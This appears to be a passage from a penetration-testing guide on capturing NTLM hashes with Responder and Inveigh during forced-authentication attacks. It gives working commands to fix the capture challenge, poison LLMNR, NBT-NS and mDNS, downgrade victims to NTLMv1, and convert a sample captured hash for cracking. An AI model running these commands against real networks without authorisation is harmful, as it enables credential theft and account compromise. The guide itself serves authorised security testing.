NTLM capture can be combined with any forced authentication attack. Testers should dissociate the name poisoning features that Responder and Inveigh offer from their capturing features. Those tools can be combined with others offering different "authentication forcing" attacks (like IPv6 + name poisoning, MS-RPRN abuse and so on).
Responder (Python) and Inveigh (Powershell) are great tools able to do name poisoning for forced authentication attacks, but also able to capture responses (LM or NTLM hashes) by starting servers waiting for incoming authentications. Once those listening servers are up and ready, the tester can initiate the forced authentication attack.
For Inveigh, it can be defined with a command-line argument. For Responder, testers need to edit the configuration file.
sed -i 's/ Random/ 1122334455667788/g' /PATH/TO/Responder/Responder.conf
From UNIX-like systems, Responder (Python) can be used to start servers listening for NTLM authentications over many protocols (SMB, HTTP, LDAP, FTP, POP3, IMAP, SMTP, ...). Depending on the authenticating principal's configuration, the NTLM authentication can sometimes be downgraded with
--disable-essin order to obtain NTLMv1 responses.
responder --interface "eth0" --analyze
responder -I "eth0" -A
# with downgrading
responder --interface "eth0" --analyze --lm --disable-ess
ntlmv1-multi --ntlmv1 SV01$::BREAKING.BAD:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:1122334455667788
There are cases where a downgrade attempt will fail and the capture authentication will not be shown. Testers should always try to capture authentication with and without downgrading.
Start poisoning LLMNR, NBT-NS and mDNS with a custom challenge, enable HTTPS capturing, enable proxy server authentication captures
.\Inveigh.exe -Challenge 1122334455667788 -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y